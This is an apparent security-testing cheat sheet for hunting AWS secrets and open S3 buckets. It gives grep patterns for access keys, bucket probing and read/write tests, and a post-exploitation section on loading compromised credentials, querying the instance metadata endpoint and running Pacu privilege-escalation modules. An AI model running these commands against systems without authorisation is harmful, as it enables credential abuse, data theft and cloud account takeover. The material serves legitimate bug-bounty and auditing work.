Secrets Hunting
If you're hunting for secrets in git repos, you can try some of these commands:
Search for AWS keys in bash scripts
find / -name '*.sh' -exec grep -HE "([^A-Z0-9]|^)AKIA[A-Z0-9]{12,}" {} \;
Resource:
https://twitter.com/omespino/status/1242977678329819141?s=20
Search for access keys with grep
Access key:
grep -RP '(?<![A-Z0-9])[A-Z0-9]{20}(?![A-Z0-9])' * 2>/dev/null
Secret access key:
grep -RP '(?<![A-Za-z0-9/+=])[A-Za-z0-9/+=]{40}(?![A-Za-z0-9/+=])' * 2>/dev/null
Resource:
https://gist.github.com/hsuh/88360eeadb0e8f7136c37fd46a62ee10
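These only search the working tree. To sweep a repo's entire history for the same pattern, something along these lines should work (run from inside the repo; AKIA plus 16 characters is the usual access key ID format):
git grep -E 'AKIA[A-Z0-9]{16}' $(git rev-list --all)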
S3
Hunting
S3 buckets can be reached via a web interface regardless of whether access is permitted. The URL formats are:
https://<bucketname>.s3.amazonaws.com
https://s3.amazonaws.com/<bucketname>
A couple of things worth keeping in mind for creating tooling around hunting for buckets:
- Names must be >= 3 && <= 63 characters long
- Names can contain lowercase letters, numbers and hyphens
- Names consist of labels, which can be separated with periods. Each label must start and end with a lowercase letter or number
- Bucket names can't be formatted as an IP address
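If you're generating candidate names in a script, a rough bash validator for the rules above can prune invalid guesses before you spend any requests (my own sketch, not taken verbatim from the S3 docs):
is_valid_bucket_name() {
    local name="$1"
    # must be 3-63 characters long
    (( ${#name} >= 3 && ${#name} <= 63 )) || return 1
    # labels of lowercase letters, numbers, and hyphens; each label starts and ends alphanumeric
    [[ "$name" =~ ^[a-z0-9]([a-z0-9-]*[a-z0-9])?(\.[a-z0-9]([a-z0-9-]*[a-z0-9])?)*$ ]] || return 1
    # reject anything formatted like an IP address
    [[ "$name" =~ ^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$ ]] && return 1
    return 0
}
Usage: is_valid_bucket_name "my-bucket" && echo valid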
Response codes
- 404 - bucket doesn't exist
- 403 - bucket exists but you don't have access
- 200 - bucket exists and is accessible
If a bucket returns a 403, you can still do some things with the S3 API (requests are billed per 1,000, so be sparing when hunting for buckets at scale).
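A minimal loop that classifies a wordlist of candidate names by those response codes (wordlist.txt is a placeholder for whatever list you're using):
while read -r bucket; do
    code=$(curl -s -o /dev/null -w "%{http_code}" "https://${bucket}.s3.amazonaws.com")
    echo "${code} ${bucket}"   # 404 = no bucket, 403 = exists, 200 = listable
done < wordlist.txt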
AWS CLI
It's also worth trying things out with the CLI. Remember to test both reading and writing, since sometimes you can do one but not the other.
List files in bucket:
aws s3 ls s3://bucketname
Copy a file to a bucket:
aws s3 cp canary.txt s3://bucketname
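A quick probe that exercises both directions in one go (bucketname is a placeholder; the canary gets removed afterwards if the write landed):
# read check: can we list the bucket?
aws s3 ls s3://bucketname && echo "read OK"
# write check: drop a canary file, then clean it up
echo "canary $(date)" > canary.txt
aws s3 cp canary.txt s3://bucketname/ && echo "write OK"
aws s3 rm s3://bucketname/canary.txt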
Google Dorks
site:s3.amazonaws.com example
site:s3.amazonaws.com example.com
site:s3.amazonaws.com example-com
site:s3.amazonaws.com com.example
site:s3.amazonaws.com com-example
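These permutations are mechanical enough to script; a small sketch that emits them for an arbitrary target domain:
domain="example.com"     # target domain
name="${domain%%.*}"     # "example"
tld="${domain##*.}"      # "com"
for d in "$name" "$domain" "$name-$tld" "$tld.$name" "$tld-$name"; do
    echo "site:s3.amazonaws.com $d"
done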
List the size and name of S3 buckets your credentials can access
Be sure to change the region.
#!/bin/bash
aws_profile=('default' 'otherprofile')

# loop over AWS profiles
for i in "${aws_profile[@]}"; do
    echo "${i}"
    # collect the bucket names visible to this profile (third column of the listing)
    buckets=($(aws --profile "${i}" --region us-east-2 s3 ls s3:// --recursive | awk '{print $3}'))
    # loop over S3 buckets, printing only the summary's final line (the total size)
    for j in "${buckets[@]}"; do
        echo "${j}"
        aws --profile "${i}" --region us-east-2 s3 ls s3://"${j}" --recursive --human-readable --summarize | awk 'END {print}'
    done
done
Run S3Scanner
git clone git@github.com:sa7mon/S3Scanner.git
cd S3Scanner
pipenv shell
pip install -r requirements.txt
python s3scanner.py buckets_to_test.txt
buckets_to_test.txt should generally look something like this:
a-bucket
b-bucket
Just to make sure it's totally clear what exactly you should put into buckets_to_test.txt: if you were to run a curl command to test whether the first bucket was open, you would run something like this:
# if 200, then it's open
curl -s -o /dev/null -w "%{http_code}" https://s3.amazonaws.com/a-bucket
# if 200, then it's open
curl -s -o /dev/null -w "%{http_code}" -L https://a-bucket.s3.amazonaws.com
Do not name your input file buckets.txt or this thing will get stuck in an infinite loop!
Resources:
https://craighays.com/bug-bounty-hunting-tips-3-kicking-s3-buckets/
https://blog.securitybreached.org/2018/09/24/subdomain-takeover-via-unsecured-s3-bucket/
https://devops.stackexchange.com/questions/2241/view-all-aws-s3-buckets-and-list-each-buckets-storage-used
Post Exploitation
This is a good place to start if you've got credentials or you've compromised a system that's hosted on AWS.
Configure credentials for the AWS CLI
If you have any existing AWS environment variables set, unset them:
unset {AWS_DEFAULT_REGION,AWS_SECRET_ACCESS_KEY,AWS_ACCESS_KEY_ID,AWS_SESSION_TOKEN}
Add the compromised keys to ~/.aws/credentials. It should look something like this:
[target_name]
aws_access_key_id=AKIAIOSFODNN7EXAMPLE
aws_secret_access_key=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
aws_session_token=AQoDYXdzEJr...<remainder of security token>
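If you'd rather not edit the file by hand, aws configure set (a standard CLI command) writes the same entries:
aws configure set aws_access_key_id AKIAIOSFODNN7EXAMPLE --profile target_name
aws configure set aws_secret_access_key wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY --profile target_name
aws configure set aws_session_token "AQoDYXdzEJr..." --profile target_name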
Make sure to set the proper region as well in ~/.aws/config, which you can get using this command on the compromised instance:
curl http://169.254.169.254/latest/dynamic/instance-identity/document
An alternative with wget:
wget -O - -q http://169.254.169.254/latest/dynamic/instance-identity/document
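If the instance enforces IMDSv2, the plain request comes back 401 and you need a session token first. The token flow below is the documented IMDSv2 pattern, with jq tacked on to pull out just the region:
TOKEN=$(curl -s -X PUT "http://169.254.169.254/latest/api/token" \
    -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
curl -s -H "X-aws-ec2-metadata-token: $TOKEN" \
    http://169.254.169.254/latest/dynamic/instance-identity/document | jq -r '.region'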
The entry in ~/.aws/config should look something like this:
[target_name]
region = target_region_here
output = json
Set the profile:
export AWS_PROFILE=target_name
Get UserID
aws sts get-caller-identity --output json | jq -r '.UserId'
Test IAM for priv esc potential
ScoutSuite
https://github.com/nccgroup/ScoutSuite will generate an HTML report outlining various issues that exist in the configuration for a given account.
Install:
git clone git@github.com:nccgroup/ScoutSuite.git
cd ScoutSuite
pipenv --python 3
pipenv shell
pip install -r requirements.txt
Run:
python scout.py aws --profile $PROFILE_NAME
Resource: https://kalilinuxtutorials.com/scout-suite-multi-cloud-security-auditing-tool/
Pacu
Set the keys
This will import the keys stored under the default profile in ~/.aws/credentials:
import_keys default
Set the region
This will set the region to us-east-2:
set_regions us-east-2
Verify credentials
whoami
List modules
ls
Run module
This will run a module to enumerate permissions the current account has:
run iam__enum_permissions
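Once it finishes, whoami reflects the enumerated permissions. A natural follow-up, assuming your Pacu version ships the module, is the privilege escalation scanner:
run iam__privesc_scan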